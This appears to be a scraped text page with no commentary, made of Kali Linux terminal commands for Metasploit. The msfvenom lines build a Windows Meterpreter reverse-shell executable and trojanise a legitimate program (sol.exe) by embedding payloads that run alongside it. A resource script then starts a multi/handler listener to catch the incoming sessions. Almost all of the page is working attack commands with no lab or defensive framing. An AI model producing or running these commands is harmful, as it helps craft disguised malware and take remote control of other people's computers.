You are on page 1of 1

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192

.168.1.101 -b "\x00" -f exe -o Meterpreter.exe


msfvenom -a x86 --platform windows -x sol.exe -k -p windows/messagebox LHOST=192
.168.1.101 -b "\x00" -f exe -o sol_bdoor.exe
msfvenom -a x86 --platform windows -x sol.exe -k -p windows/meterpreter/reverse_
tcp LHOST=192.168.1.101 -b "\x00" -f exe -o sol_bdoor.exe

root@kali:~#
root@kali:~#
root@kali:~#
root@kali:~#
root@kali:~#
root@kali:~#

touch meterpreter.rc
echo use exploit/multi/handler >> meterpreter.rc
echo set PAYLOAD windows/meterpreter/reverse_tcp >> meterpreter.rc
echo set LHOST 192.168.1.184 >> meterpreter.rc
echo set ExitOnSession false >> meterpreter.rc
echo exploit -j -z >> meterpreter.rc

root@kali:~# msfconsole -r meterpreter.rc

You might also like